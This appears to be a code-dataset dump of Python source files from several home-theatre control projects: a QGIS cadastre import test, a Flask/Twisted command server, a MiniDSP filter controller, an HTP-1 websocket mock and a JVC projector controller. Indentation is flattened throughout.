dialog.liDbType.setCurrentIndex(1)
# Let the default connexion
self.assertEqual(dialog.liDbConnection.count(), 1)
# Check empty database before
metadata = QgsProviderRegistry.instance().providerMetadata("postgres")
connection = metadata.findConnection("test_database")
connection: QgsAbstractDatabaseProviderConnection
if schema in connection.schemas():
connection.dropSchema(schema, True)
self.assertNotIn(schema, connection.schemas())
# Create schema
dialog.inDbCreateSchema.setText(schema)
dialog.btDbCreateSchema.click()
# Check the schema exists
self.assertIn(schema, connection.schemas())
# Set the path for edigeo
dialog.inEdigeoSourceDir.setText(str(plugin_test_data_path('edigeo', '13029')))
# Set CRS
crs = QgsCoordinateReferenceSystem("EPSG:2154")
dialog.inEdigeoSourceProj.setCrs(crs)
dialog.inEdigeoTargetProj.setCrs(crs)
# Set MAJIC
dialog.inMajicSourceDir.setText(str(plugin_test_data_path('majic', '13029')))
# Set lot
dialog.inEdigeoLot.setText('1')
# Set departement
dialog.inEdigeoDepartement.setText('13')
# Set direction
dialog.inEdigeoDirection.setValue(2)
# Version
dialog.inDataVersion.setValue(2019)
# Year
dialog.inDataYear.setValue(2019)
# Import
dialog.btProcessImport.click()
# Check we have a town in edigeo
results = connection.executeSql('SELECT "geo_commune", "tex2" FROM cadastre.geo_commune;')
self.assertEqual(1, len(results))
row = results[0]
self.assertEqual("132029", row[0])
self.assertEqual("CORNILLON-CONFOUX", row[1])
# Check we have a town in majic
results = connection.executeSql('SELECT * FROM cadastre.commune_majic;')
self.assertEqual(1, len(results))
row = results[0]
self.assertEqual("132029", row[0]) # commune
self.assertEqual("2019", row[1]) # annee
self.assertEqual("13", row[2]) # ccodep
self.assertEqual("2", row[3]) # ccodir
self.assertEqual("029", row[4]) # ccocom
self.assertEqual("CORNILLON-CONFOUX", row[5]) # libcom
self.assertEqual("1", row[6]) # lot
``` |
{
"source": "3ll3d00d/cmdserver",
"score": 2
} |
#### File: cmdserver/src/cmdserver.py
```python
import faulthandler
import os
from os import path
from autobahn.twisted.resource import WebSocketResource
from flask import Flask
from flask_restx import Api
from pj import PJ, UpdatePJ, Info
from pjcontroller import PJController
from command import Commands, Command
from commandcontroller import CommandController
from config import Config
from playingnow import PlayingNow, InfoProvider
from tivo import Tivos, Tivo
from tivocontroller import TivoController
from ws import WsServer
API_PREFIX = '/api/1'
faulthandler.enable()
if hasattr(faulthandler, 'register'):
import signal
faulthandler.register(signal.SIGUSR2, all_threads=True)
app = Flask(__name__)
api = Api(app)
cfg = Config('cmdserver')
ws_server = WsServer()
info_provider = InfoProvider(cfg, ws_server)
resource_args = {
'command_controller': CommandController(cfg),
'tivoController': TivoController(),
'pj_controller': PJController(cfg),
'info_provider': info_provider,
'config': cfg
}
# GET: gets the available commands
api.add_resource(Commands, API_PREFIX + '/commands', resource_class_kwargs=resource_args)
# PUT: executes a command
api.add_resource(Command, API_PREFIX + '/commands/<command>', resource_class_kwargs=resource_args)
# GET: gets the current state of the playback system
api.add_resource(PlayingNow, API_PREFIX + '/playingnow', resource_class_kwargs=resource_args)
# GET: available TIVOs
# POST: send a command
api.add_resource(Tivos, API_PREFIX + '/tivos', resource_class_kwargs=resource_args)
# GET: get from tivo
api.add_resource(Tivo, API_PREFIX + '/tivo/<tivo>', resource_class_kwargs=resource_args)
# GET: get info
api.add_resource(Info, API_PREFIX + '/info', resource_class_kwargs=resource_args)
# GET: read only command
api.add_resource(PJ, API_PREFIX + '/pj/<command>', resource_class_kwargs=resource_args)
# PUT: write command
api.add_resource(UpdatePJ, API_PREFIX + '/pj', resource_class_kwargs=resource_args)
def main(args=None):
""" The main routine. """
logger = cfg.configure_logger()
if cfg.useTwisted:
import logging
logger = logging.getLogger('twisted')
from twisted.internet import reactor
from twisted.web.resource import Resource
from twisted.web import static, server
from twisted.web.wsgi import WSGIResource
from twisted.application import service
from twisted.internet import endpoints
class ReactApp:
"""
Handles the react app (excluding the static dir).
"""
def __init__(self, path):
# TODO allow this to load when in debug mode even if the files don't exist
self.publicFiles = {f: static.File(os.path.join(path, f)) for f in os.listdir(path) if
os.path.exists(os.path.join(path, f))}
self.indexHtml = ReactIndex(os.path.join(path, 'index.html'))
def get_file(self, path):
"""
overrides getChild so it always just serves index.html unless the file does actually exist (i.e. is an
icon or something like that)
"""
return self.publicFiles.get(path.decode('utf-8'), self.indexHtml)
class ReactIndex(static.File):
"""
a twisted File which overrides getChild so it always just serves index.html (NB: this is a bit of a hack,
there is probably a more correct way to do this but...)
"""
def getChild(self, path, request):
return self
class FlaskAppWrapper(Resource):
"""
wraps the flask app as a WSGI resource while allow the react index.html (and its associated static content)
to be served as the default page.
"""
def __init__(self):
super().__init__()
self.wsgi = WSGIResource(reactor, reactor.getThreadPool(), app)
import sys
if getattr(sys, 'frozen', False):
# pyinstaller lets you copy files to arbitrary locations under the _MEIPASS root dir
uiRoot = os.path.join(sys._MEIPASS, 'ui')
elif cfg.webappPath is not None:
uiRoot = cfg.webappPath
else:
# release script moves the ui under the analyser package because setuptools doesn't seem to include
# files from outside the package
uiRoot = os.path.join(os.path.dirname(__file__), 'ui')
logger.info('Serving ui from ' + str(uiRoot))
self.react = ReactApp(uiRoot)
self.static = static.File(os.path.join(uiRoot, 'static'))
self.icons = static.File(cfg.iconPath)
ws_server.factory.startFactory()
self.ws_resource = WebSocketResource(ws_server.factory)
def getChild(self, path, request):
"""
Overrides getChild to allow the request to be routed to the wsgi app (i.e. flask for the rest api
calls), the static dir (i.e. for the packaged css/js etc), the various concrete files (i.e. the public
dir from react-app), the command icons or to index.html (i.e. the react app) for everything else.
:param path:
:param request:
:return:
"""
# allow CORS (CROSS-ORIGIN RESOURCE SHARING) for debug purposes
request.setHeader('Access-Control-Allow-Origin', '*')
request.setHeader('Access-Control-Allow-Methods', 'GET, PUT')
request.setHeader('Access-Control-Allow-Headers', 'x-prototype-version,x-requested-with')
request.setHeader('Access-Control-Max-Age', '2520') # 42 hours
logger.debug(f"Handling {path}")
if path == b'ws':
return self.ws_resource
elif path == b'api':
request.prepath.pop()
request.postpath.insert(0, path)
return self.wsgi
elif path == b'static':
return self.static
elif path == b'icons':
return self.icons
else:
return self.react.get_file(path)
def render(self, request):
return self.wsgi.render(request)
application = service.Application('cmdserver')
if cfg.is_access_logging is True:
site = server.Site(FlaskAppWrapper(), logPath=path.join(cfg.config_path, 'access.log').encode())
else:
site = server.Site(FlaskAppWrapper())
endpoint = endpoints.TCP4ServerEndpoint(reactor, cfg.port, interface='0.0.0.0')
endpoint.listen(site)
reactor.run()
else:
logger.error('Icons are not available in debug mode')
# get config from a flask standard place not our config yml
app.run(debug=cfg.run_in_debug, host='0.0.0.0', port=cfg.port, use_reloader=False)
if __name__ == '__main__':
main()
``` |
{
"source": "3ll3d00d/ezbeq",
"score": 2
} |
#### File: ezbeq/ezbeq/minidsp.py
```python
import json
import logging
import os
from concurrent.futures.thread import ThreadPoolExecutor
from contextlib import contextmanager
from typing import List, Optional, Union
import math
import time
from autobahn.exception import Disconnected
from autobahn.twisted import WebSocketClientFactory, WebSocketClientProtocol
from twisted.internet.protocol import ReconnectingClientFactory
from ezbeq.apis.ws import WsServer
from ezbeq.catalogue import CatalogueEntry, CatalogueProvider
from ezbeq.device import InvalidRequestError, SlotState, PersistentDevice, DeviceState
logger = logging.getLogger('ezbeq.minidsp')
class MinidspState(DeviceState):
def __init__(self, name: str, **kwargs):
self.__name = name
self.master_volume: float = kwargs['mv'] if 'mv' in kwargs else 0.0
self.__mute: bool = kwargs['mute'] if 'mute' in kwargs else False
self.__active_slot: str = kwargs['active_slot'] if 'active_slot' in kwargs else ''
slot_ids = [str(i + 1) for i in range(4)]
self.__slots: List[MinidspSlotState] = [MinidspSlotState(c_id, c_id == self.active_slot) for c_id in slot_ids]
def update_master_state(self, mute: bool, gain: float):
self.__mute = mute
self.master_volume = gain
def activate(self, slot_id: str):
self.__active_slot = slot_id
for s in self.__slots:
s.active = s.slot_id == slot_id
@property
def active_slot(self) -> str:
return self.__active_slot
@property
def mute(self) -> bool:
return self.__mute
def load(self, slot_id: str, title: str):
self.get_slot(slot_id).last = title
self.activate(slot_id)
def get_slot(self, slot_id) -> 'MinidspSlotState':
return next(s for s in self.__slots if s.slot_id == slot_id)
def clear(self, slot_id):
slot = self.get_slot(slot_id)
slot.unmute(None)
slot.set_gain(None, 0.0)
slot.last = 'Empty'
self.activate(slot_id)
def error(self, slot_id):
self.get_slot(slot_id).last = 'ERROR'
self.activate(slot_id)
def gain(self, slot_id: Optional[str], channel: Optional[int], gain: float):
if slot_id is None:
self.master_volume = gain
else:
self.get_slot(slot_id).set_gain(channel, gain)
self.activate(slot_id)
def toggle_mute(self, slot_id: Optional[str], channel: Optional[int], mute: bool):
if slot_id is None:
self.__mute = mute
else:
slot = self.get_slot(slot_id)
if mute:
slot.mute(channel)
else:
slot.unmute(channel)
self.activate(slot_id)
def serialise(self) -> dict:
return {
'name': self.__name,
'masterVolume': self.master_volume,
'mute': self.__mute,
'slots': [s.as_dict() for s in self.__slots]
}
def merge_with(self, cached: dict) -> None:
saved_slots_by_id = {v['id']: v for v in cached.get('slots', [])}
current_slots_by_id = {s.slot_id: s for s in self.__slots}
if saved_slots_by_id.keys() == current_slots_by_id.keys():
for slot_id, state in saved_slots_by_id.items():
current_slots_by_id[slot_id].merge_with(state)
class MinidspSlotState(SlotState['MinidspSlotState']):
def __init__(self, slot_id: str, active: bool):
super().__init__(slot_id)
self.gain1 = 0.0
self.mute1 = False
self.gain2 = 0.0
self.mute2 = False
self.active = active
def clear(self):
super().clear()
self.gain1 = 0.0
self.gain2 = 0.0
self.mute1 = False
self.mute2 = False
def set_gain(self, channel: Optional[int], value: float):
if channel is None:
self.gain1 = value
self.gain2 = value
else:
if channel == 1:
self.gain1 = value
elif channel == 2:
self.gain2 = value
else:
raise ValueError(f'Unknown channel {channel} for slot {self.slot_id}')
def mute(self, channel: Optional[int]):
self.__do_mute(channel, True)
def __do_mute(self, channel: Optional[int], value: bool):
if channel is None:
self.mute1 = value
self.mute2 = value
else:
if channel == 1:
self.mute1 = value
elif channel == 2:
self.mute2 = value
else:
raise ValueError(f'Unknown channel {channel} for slot {self.slot_id}')
def unmute(self, channel: Optional[int]):
self.__do_mute(channel, False)
def merge_with(self, state: dict) -> None:
super().merge_with(state)
if 'gain1' in state:
self.gain1 = float(state['gain1'])
if 'gain2' in state:
self.gain2 = float(state['gain2'])
if 'mute1' in state:
self.mute1 = bool(state['mute1'])
if 'mute2' in state:
self.mute2 = bool(state['mute2'])
def as_dict(self) -> dict:
sup = super().as_dict()
return {
**sup,
'gain1': self.gain1,
'gain2': self.gain2,
'mute1': self.mute1,
'mute2': self.mute2,
'canActivate': True
}
def __repr__(self):
return f"{super().__repr__()} - 1: {self.gain1:.2f}/{self.mute1} 2: {self.gain2:.2f}/{self.mute2}"
class Minidsp(PersistentDevice[MinidspState]):
def __init__(self, name: str, config_path: str, cfg: dict, ws_server: WsServer, catalogue: CatalogueProvider):
super().__init__(config_path, name, ws_server)
self.__catalogue = catalogue
self.__executor = ThreadPoolExecutor(max_workers=1)
self.__cmd_timeout = cfg.get('cmdTimeout', 10)
self.__ignore_retcode = cfg.get('ignoreRetcode', False)
self.__levels_interval = 1.0 / float(cfg.get('levelsFps', 10))
self.__runner = cfg['make_runner']()
self.__client = MinidspRsClient(self) if cfg.get('useWs', False) else None
ws_server.factory.set_levels_provider(name, self.start_broadcast_levels)
@property
def device_type(self) -> str:
return self.__class__.__name__.lower()
@property
def supports_gain(self) -> bool:
return True
def __load_state(self) -> MinidspState:
result = self.__executor.submit(self.__read_state_from_device).result(timeout=self.__cmd_timeout)
return result if result else MinidspState(self.name)
def __read_state_from_device(self) -> Optional[MinidspState]:
output = None
try:
kwargs = {'retcode': None} if self.__ignore_retcode else {}
output = self.__runner['-o', 'jsonline'](timeout=self.__cmd_timeout, **kwargs)
lines = output.splitlines()
if lines:
status = json.loads(lines[0])
values = {
'active_slot': str(status['master']['preset'] + 1),
'mute': status['master']['mute'],
'mv': status['master']['volume']
}
return MinidspState(self.name, **values)
else:
logger.error(f"No output returned from device")
except:
logger.exception(f"Unable to parse device state {output}")
return None
@staticmethod
def __as_idx(idx: Union[int, str]):
return int(idx) - 1
def __send_cmds(self, target_slot_idx: Optional[int], cmds: List[str]):
return self.__executor.submit(self.__do_run, cmds, target_slot_idx).result(timeout=self.__cmd_timeout)
def activate(self, slot: str):
def __do_it():
target_slot_idx = self.__as_idx(slot)
self.__validate_slot_idx(target_slot_idx)
self.__send_cmds(target_slot_idx, [])
self._current_state.activate(slot)
self._hydrate_cache_broadcast(__do_it)
@staticmethod
def __validate_slot_idx(target_slot_idx):
if target_slot_idx < 0 or target_slot_idx > 3:
raise InvalidRequestError(f"Slot must be in range 1-4")
def load_biquads(self, slot: str, overwrite: bool, inputs: List[int], outputs: List[int], biquads: List[dict]) -> None:
def __do_it():
target_slot_idx = self.__as_idx(slot)
self.__validate_slot_idx(target_slot_idx)
cmds = MinidspBeqCommandGenerator.biquads(overwrite, inputs, outputs, biquads)
try:
self.__send_cmds(target_slot_idx, cmds)
if inputs:
self._current_state.load(slot, 'CUSTOM')
else:
self._current_state.activate(slot)
except Exception as e:
self._current_state.error(slot)
raise e
self._hydrate_cache_broadcast(__do_it)
def load_filter(self, slot: str, entry: CatalogueEntry) -> None:
def __do_it():
target_slot_idx = self.__as_idx(slot)
self.__validate_slot_idx(target_slot_idx)
cmds = MinidspBeqCommandGenerator.filt(entry)
try:
self.__send_cmds(target_slot_idx, cmds)
self._current_state.load(slot, entry.formatted_title)
except Exception as e:
self._current_state.error(slot)
raise e
self._hydrate_cache_broadcast(__do_it)
def clear_filter(self, slot: str) -> None:
def __do_it():
target_slot_idx = self.__as_idx(slot)
self.__validate_slot_idx(target_slot_idx)
cmds = MinidspBeqCommandGenerator.filt(None)
cmds.extend(MinidspBeqCommandGenerator.mute(False, target_slot_idx, None))
cmds.extend(MinidspBeqCommandGenerator.gain(0.0, target_slot_idx, None))
try:
self.__send_cmds(target_slot_idx, cmds)
self._current_state.clear(slot)
except Exception as e:
self._current_state.error(slot)
raise e
self._hydrate_cache_broadcast(__do_it)
def mute(self, slot: Optional[str], channel: Optional[int]) -> None:
self.__do_mute_op(slot, channel, True)
def __do_mute_op(self, slot: Optional[str], channel: Optional[int], state: bool):
def __do_it():
target_channel_idx, target_slot_idx = self.__as_idxes(channel, slot)
if target_slot_idx:
self.__validate_slot_idx(target_slot_idx)
cmds = MinidspBeqCommandGenerator.mute(state, target_slot_idx, target_channel_idx)
self.__send_cmds(target_slot_idx, cmds)
self._current_state.toggle_mute(slot, channel, state)
self._hydrate_cache_broadcast(__do_it)
def unmute(self, slot: Optional[str], channel: Optional[int]) -> None:
self.__do_mute_op(slot, channel, False)
def set_gain(self, slot: Optional[str], channel: Optional[int], gain: float) -> None:
def __do_it():
target_channel_idx, target_slot_idx = self.__as_idxes(channel, slot)
cmds = MinidspBeqCommandGenerator.gain(gain, target_slot_idx, target_channel_idx)
self.__send_cmds(target_slot_idx, cmds)
self._current_state.gain(slot, channel, gain)
self._hydrate_cache_broadcast(__do_it)
def __as_idxes(self, channel, slot):
target_slot_idx = self.__as_idx(slot) if slot else None
target_channel_idx = self.__as_idx(channel) if channel else None
return target_channel_idx, target_slot_idx
def __do_run(self, config_cmds: List[str], slot: Optional[int]):
if slot is not None:
change_slot = True
current_state = self.__read_state_from_device()
if current_state and current_state.active_slot == str(slot + 1):
change_slot = False
if change_slot is True:
logger.info(f"Activating slot {slot}, current is {current_state.active_slot if current_state else 'UNKNOWN'}")
config_cmds.insert(0, MinidspBeqCommandGenerator.activate(slot))
formatted = '\n'.join(config_cmds)
logger.info(f"\n{formatted}")
with tmp_file(config_cmds) as file_name:
kwargs = {'retcode': None} if self.__ignore_retcode else {}
logger.info(
f"Sending {len(config_cmds)} commands to slot {slot} via {file_name} {kwargs if kwargs else ''}")
start = time.time()
code, stdout, stderr = self.__runner['-f', file_name].run(timeout=self.__cmd_timeout, **kwargs)
end = time.time()
logger.info(
f"Sent {len(config_cmds)} commands to slot {slot} in {to_millis(start, end)}ms - result is {code}")
def _load_initial_state(self) -> MinidspState:
return self.__load_state()
def state(self) -> MinidspState:
if not self._hydrate():
new_state = self.__load_state()
self._current_state.update_master_state(new_state.mute, new_state.master_volume)
return self._current_state
def _merge_state(self, loaded: MinidspState, cached: dict) -> MinidspState:
loaded.merge_with(cached)
return loaded
def update(self, params: dict) -> bool:
def __do_it() -> bool:
any_update = False
if 'slots' in params:
for slot in params['slots']:
any_update |= self.__update_slot(slot)
if 'mute' in params and params['mute'] != self._current_state.mute:
if self._current_state.mute:
self.unmute(None, None)
else:
self.mute(None, None)
any_update = True
if 'masterVolume' in params and not math.isclose(params['masterVolume'], self._current_state.master_volume):
self.set_gain(None, None, params['masterVolume'])
any_update = True
return any_update
return self._hydrate_cache_broadcast(__do_it)
def __update_slot(self, slot: dict) -> bool:
any_update = False
current_slot = self._current_state.get_slot(slot['id'])
if 'gain1' in slot:
self.set_gain(current_slot.slot_id, 1, slot['gain1'])
any_update = True
if 'gain2' in slot:
self.set_gain(current_slot.slot_id, 2, slot['gain2'])
any_update = True
if 'mute1' in slot:
if slot['mute1'] is True:
self.mute(current_slot.slot_id, 1)
else:
self.unmute(current_slot.slot_id, 1)
any_update = True
if 'mute2' in slot:
if slot['mute1'] is True:
self.mute(current_slot.slot_id, 2)
else:
self.unmute(current_slot.slot_id, 2)
any_update = True
if 'entry' in slot:
if slot['entry']:
match = self.__catalogue.find(slot['entry'])
if match:
self.load_filter(current_slot.slot_id, match)
any_update = True
else:
self.clear_filter(current_slot.slot_id)
if 'active' in slot:
self.activate(current_slot.slot_id)
any_update = True
return any_update
def levels(self) -> dict:
return self.__executor.submit(self.__read_levels_from_device).result(timeout=self.__cmd_timeout)
def __read_levels_from_device(self) -> dict:
lines = None
try:
kwargs = {'retcode': None} if self.__ignore_retcode else {}
start = time.time()
lines = self.__runner['-o', 'jsonline'](timeout=self.__cmd_timeout, **kwargs)
end = time.time()
levels = json.loads(lines)
ts = time.time()
logger.info(f"readlevels,{ts},{to_millis(start, end)}")
return {
'ts': ts,
'input': levels['input_levels'],
'output': levels['output_levels']
}
except:
logger.exception(f"Unable to load levels {lines}")
return {}
def start_broadcast_levels(self) -> None:
from twisted.internet import reactor
sched = lambda: reactor.callLater(self.__levels_interval, __send)
def __send():
msg = json.dumps(self.levels())
if self.ws_server.levels(self.name, msg):
sched()
sched()
class MinidspBeqCommandGenerator:
@staticmethod
def activate(slot: int) -> str:
return f"config {slot}"
@staticmethod
def biquads(overwrite: bool, inputs: List[int], outputs: List[int], biquads: List[dict]):
# [in|out]put <channel> peq <index> set -- <b0> <b1> <b2> <a1> <a2>
# [in|out]put <channel> peq <index> bypass [on|off]
cmds = []
for side, channels in {'input': inputs, 'output': outputs}.items():
for channel in channels:
for idx, bq in enumerate(biquads):
coeffs = [bq['b0'], bq['b1'], bq['b2'], bq['a1'], bq['a2']]
cmds.append(MinidspBeqCommandGenerator.bq(channel - 1, idx, coeffs, side=side))
cmds.append(MinidspBeqCommandGenerator.bypass(channel - 1, idx, False, side=side))
if overwrite:
for idx in range(len(biquads), 10):
cmds.append(MinidspBeqCommandGenerator.bypass(channel - 1, idx, True, side=side))
return cmds
@staticmethod
def filt(entry: Optional[CatalogueEntry]):
# input <channel> peq <index> set -- <b0> <b1> <b2> <a1> <a2>
# input <channel> peq <index> bypass [on|off]
cmds = []
for c in range(2):
idx = 0
if entry:
for f in entry.filters:
bq: dict = f['biquads']['96000']
coeffs: List[str] = bq['b'] + bq['a']
if len(coeffs) != 5:
raise ValueError(f"Invalid coeff count {len(coeffs)} at idx {idx}")
else:
cmds.append(MinidspBeqCommandGenerator.bq(c, idx, coeffs))
cmds.append(MinidspBeqCommandGenerator.bypass(c, idx, False))
idx += 1
for i in range(idx, 10):
cmds.append(MinidspBeqCommandGenerator.bypass(c, i, True))
return cmds
@staticmethod
def bq(channel: int, idx: int, coeffs, side: str = 'input'):
return f"{side} {channel} peq {idx} set -- {' '.join(coeffs)}"
@staticmethod
def bypass(channel: int, idx: int, bypass: bool, side: str = 'input'):
return f"{side} {channel} peq {idx} bypass {'on' if bypass else 'off'}"
@staticmethod
def mute(state: bool, slot: Optional[int], channel: Optional[int]):
'''
Generates commands to mute the configuration.
:param state: mute if true otherwise unmute.
:param slot: the target slot, if not set apply to the master control.
:param channel: the channel, applicable only if slot is set, if not set apply to both input channels.
:return: the commands.
'''
state_cmd = 'on' if state else 'off'
if slot is not None:
cmds = []
if channel is None:
cmds.append(f"input 0 mute {state_cmd}")
cmds.append(f"input 1 mute {state_cmd}")
else:
cmds.append(f"input {channel} mute {state_cmd}")
return cmds
else:
return [f"mute {state_cmd}"]
@staticmethod
def gain(gain: float, slot: Optional[int], channel: Optional[int]):
'''
Generates commands to set gain.
:param gain: the gain to set.
:param slot: the target slot, if not set apply to the master control.
:param channel: the channel, applicable only if slot is set, if not set apply to both input channels.
:return: the commands.
'''
if slot is not None:
if not -72.0 <= gain <= 12.0:
raise InvalidRequestError(f"Input gain {gain:.2f} out of range (>= -72.0 and <= 12.0)")
cmds = []
if channel is None:
cmds.append(f"input 0 gain -- {gain:.2f}")
cmds.append(f"input 1 gain -- {gain:.2f}")
else:
cmds.append(f"input {channel} gain -- {gain:.2f}")
return cmds
else:
if not -127.0 <= gain <= 0.0:
raise InvalidRequestError(f"Master gain {gain:.2f} out of range (>= -127.0 and <= 0.0)")
return [f"gain -- {gain:.2f}"]
@contextmanager
def tmp_file(cmds: List[str]):
import tempfile
tmp_name = None
try:
f = tempfile.NamedTemporaryFile(mode='w+', delete=False)
for cmd in cmds:
f.write(cmd)
f.write('\n')
tmp_name = f.name
f.close()
yield tmp_name
finally:
if tmp_name:
os.unlink(tmp_name)
def to_millis(start, end, precision=1):
'''
Calculates the differences in time in millis.
:param start: start time in seconds.
:param end: end time in seconds.
:return: delta in millis.
'''
return round((end - start) * 1000, precision)
class MinidspRsClient:
def __init__(self, listener):
# TODO which device
self.__factory = MinidspRsClientFactory(listener, url='ws://localhost/devices/0?levels=true')
from twisted.internet.endpoints import clientFromString
from twisted.internet import reactor
wsclient = clientFromString(reactor, 'unix:path=/tmp/minidsp.sock:timeout=5')
self.__connector = wsclient.connect(self.__factory)
def send(self, msg: str):
self.__factory.broadcast(msg)
class MinidspRsProtocol(WebSocketClientProtocol):
def onConnecting(self, transport_details):
logger.info(f"Connecting to {transport_details}")
def onConnect(self, response):
logger.info(f"Connected to {response.peer}")
self.sendMessage('getmso'.encode('utf-8'), isBinary=False)
def onOpen(self):
logger.info("Connected to Minidsp")
self.factory.register(self)
def onClose(self, was_clean, code, reason):
if was_clean:
logger.info(f"Disconnected code: {code} reason: {reason}")
else:
logger.warning(f"UNCLEAN! Disconnected code: {code} reason: {reason}")
def onMessage(self, payload, is_binary):
if is_binary:
logger.warning(f"Received {len(payload)} bytes in binary payload, ignoring")
else:
msg = payload.decode('utf8')
logger.info(f"Received {msg}")
# self.factory.listener.on_msoupdate(json.loads(msg[10:]))
class MinidspRsClientFactory(WebSocketClientFactory, ReconnectingClientFactory):
protocol = MinidspRsProtocol
maxDelay = 5
initialDelay = 0.5
def __init__(self, listener, *args, **kwargs):
super(MinidspRsClientFactory, self).__init__(*args, **kwargs)
self.__clients: List[MinidspRsProtocol] = []
self.listener = listener
def clientConnectionFailed(self, connector, reason):
logger.warning(f"Client connection failed {reason} .. retrying ..")
super().clientConnectionFailed(connector, reason)
def clientConnectionLost(self, connector, reason):
logger.warning(f"Client connection failed {reason} .. retrying ..")
super().clientConnectionLost(connector, reason)
def register(self, client: MinidspRsProtocol):
if client not in self.__clients:
logger.info(f"Registered device {client.peer}")
self.__clients.append(client)
else:
logger.info(f"Ignoring duplicate device {client.peer}")
def unregister(self, client: MinidspRsProtocol):
if client in self.__clients:
logger.info(f"Unregistering device {client.peer}")
self.__clients.remove(client)
else:
logger.info(f"Ignoring unregistered device {client.peer}")
def broadcast(self, msg):
if self.__clients:
disconnected_clients = []
for c in self.__clients:
logger.info(f"Sending to {c.peer} - {msg}")
try:
c.sendMessage(msg.encode('utf8'))
except Disconnected as e:
logger.exception(f"Failed to send to {c.peer}, discarding")
disconnected_clients.append(c)
for c in disconnected_clients:
self.unregister(c)
else:
raise ValueError(f"No devices connected, ignoring {msg}")
``` |
{
"source": "3ll3d00d/htp1mock",
"score": 3
} |
#### File: htp1mock/htp1mock/__main__.py
```python
import asyncio
import websockets
import json
CHANNELS = ['lf', 'rf', 'c', 'sub1', 'sub2', 'sub3', 'ls', 'rs']
class Htp1:
def __init__(self):
self.__bands = {
'peq': {
'slots': [
{
'checksum': None,
'channels': {c: self.__make_peq() for c in CHANNELS}
} for i in range(16)
]
}
}
self.__conns = set()
@staticmethod
def __make_peq(fc=120, gain=0, q=1):
return {
'Fc': fc,
'gaindB': gain,
'Q': q
}
async def on_msg(self, websocket, path):
while True:
try:
data = await websocket.recv()
except websockets.ConnectionClosed:
print(f"Closed")
break
print(f"< {data}")
if data.startswith('changemso'):
print(f"Handling {data}")
for operation in json.loads(data[9:]):
handled = False
if operation['op'] == 'replace':
tokens = [t for t in operation['path'].split('/') if t]
if len(tokens) == 6:
slots = self.__bands['peq']['slots']
slot_idx = int(tokens[2])
if len(slots) > slot_idx:
slot = slots[slot_idx]['channels']
if tokens[4] in slot:
channel_filter = slot[tokens[4]]
if tokens[5] in channel_filter:
channel_filter[tokens[5]] = operation['value']
print(f"Updated slot {tokens[2]}/{tokens[4]} to {channel_filter}")
handled = True
if not handled:
print(f"Unable to handle {operation}")
elif data == 'getmso':
pass # nop
else:
print(f"Ignoring {path} {data}")
await websocket.send(f"mso {json.dumps(self.__bands)}")
def main():
htp1 = Htp1()
start_server = websockets.serve(htp1.on_msg, "localhost", 8765)
asyncio.get_event_loop().run_until_complete(start_server)
asyncio.get_event_loop().run_forever()
if __name__ == '__main__':
main()
``` |
{
"source": "3ll3d00d/pyjvcpj",
"score": 3
} |
#### File: pyjvcpj/src/pjcontroller.py
```python
import sys
import logging
from enum import Enum
from debounce import debounce
from jvc import CommandExecutor
from jvccommands import Command, load_all_commands, Numeric
logger = logging.getLogger('pyjvcpj.pjcontroller')
class PJController:
def __init__(self, config):
self.__pj_macros = config.pj_macros
self.__executor = CommandExecutor(host=config.pj_ip)
self.__commands = load_all_commands()
def __connect(self):
self.__executor.connect()
@debounce(4)
def __disconnect(self):
self.__executor.disconnect(fail=False)
def get(self, command):
try:
cmd = Command[command]
self.__connect()
val = self.__executor.get(cmd)
self.__disconnect()
if val is not None and isinstance(val, Enum):
return val.name
return val
except KeyError:
logger.warning(f"Ignoring unknown command {command}")
return None
except:
logger.exception(f"Unexpected failure while executing {command}")
return None
def send(self, commands):
""" Sends the commands to the PJ """
vals = []
self.__connect()
for command in commands:
if command in self.__pj_macros:
for cmd in self.__pj_macros[command]:
vals.append(self.__execute(cmd))
else:
vals.append(self.__execute(command))
self.__disconnect()
return vals
def __execute(self, cmd):
tokens = cmd.split('.')
if len(tokens) > 1:
try:
cmd_enum = Command[tokens[0]]
if isinstance(cmd_enum.value, tuple):
cmd_arg_enum = cmd_enum.value[1]
if cmd_arg_enum.__name__ == tokens[1]:
logger.info(f"Executing {cmd}")
if issubclass(cmd_arg_enum, Enum):
return self.__executor.set(cmd_enum, cmd_arg_enum[tokens[2]])
elif issubclass(cmd_arg_enum, Numeric):
return self.__executor.set(cmd_enum, Numeric(int(tokens[2])))
else:
logger.warning(f"Unsupported value type for {cmd} - {cmd_arg_enum.__name__}")
except (AttributeError, KeyError):
logger.warning(f"Ignoring unknown command {cmd}")
except:
logger.exception(f"Unexpected exception while processing {cmd}")
logger.error(f"Ignoring unknown command {cmd}")
```
#### File: pyjvcpj/src/pyjvcpj.py
```python
import faulthandler
from os import path
from flask import Flask
from flask_restful import Api
from pj import PJ, UpdatePJ, Info
from pjcontroller import PJController
from config import Config
API_PREFIX = '/api/1'
faulthandler.enable()
if hasattr(faulthandler, 'register'):
import signal
faulthandler.register(signal.SIGUSR2, all_threads=True)
app = Flask(__name__)
api = Api(app)
cfg = Config('pyjvcpj')
resource_args = {
'pj_controller': PJController(cfg)
}
if cfg.pj_ip is None:
raise AttributeError("pjip must be set in {self.config_file}")
# GET: get info
api.add_resource(Info, API_PREFIX + '/info', resource_class_kwargs=resource_args)
# GET: read only command
api.add_resource(PJ, API_PREFIX + '/pj/<command>', resource_class_kwargs=resource_args)
# PUT: write command
api.add_resource(UpdatePJ, API_PREFIX + '/pj', resource_class_kwargs=resource_args)
def main(args=None):
""" The main routine. """
logger = cfg.configure_logger()
if cfg.use_twisted:
import logging
logger = logging.getLogger('twisted')
from twisted.internet import reactor
from twisted.web.resource import Resource
from twisted.web import server
from twisted.web.wsgi import WSGIResource
from twisted.application import service
from twisted.internet import endpoints
class FlaskAppWrapper(Resource):
"""
wraps the flask app as a WSGI resource while allow the react index.html (and its associated static content)
to be served as the default page.
"""
def __init__(self):
super().__init__()
self.wsgi = WSGIResource(reactor, reactor.getThreadPool(), app)
def getChild(self, path, request):
"""
Overrides getChild to allow the request to be routed to the wsgi app (i.e. flask for the rest api
calls), the static dir (i.e. for the packaged css/js etc), the various concrete files (i.e. the public
dir from react-app), the command icons or to index.html (i.e. the react app) for everything else.
:param path:
:param request:
:return:
"""
# allow CORS (CROSS-ORIGIN RESOURCE SHARING) for debug purposes
request.setHeader('Access-Control-Allow-Origin', '*')
request.setHeader('Access-Control-Allow-Methods', 'GET, PUT')
request.setHeader('Access-Control-Allow-Headers', 'x-prototype-version,x-requested-with')
request.setHeader('Access-Control-Max-Age', '2520') # 42 hours
logger.debug(f"Handling {path}")
if path == b'api':
request.prepath.pop()
